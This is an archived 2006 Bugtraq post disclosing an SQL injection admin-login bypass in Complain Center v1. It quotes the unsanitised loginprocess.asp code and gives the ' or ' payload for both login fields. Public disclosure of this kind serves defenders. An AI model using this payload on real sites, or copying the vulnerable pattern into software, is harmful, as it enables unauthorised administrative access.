lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060914200201.29022.qmail@securityfocus.com> Date: 14 Sep 2006 20:02:01 -0000 From: ajannhwt@...mail.com To: bugtraq@...urityfocus.com Subject: Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection ENGLISH # Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection # Author : ajann # Exploit; [CODE] loginprocess.asp: .. ... dim varUser dim varPass varUser=Request.Form("TxtUser") No Secure : ) varPass=Request.Form("TxtPass") No Secure : ) .. ... //Before join login page http://[target]/[path]/login.asp Username : ' or ' Password : ' or ' and Login Ok # ajann,Turkey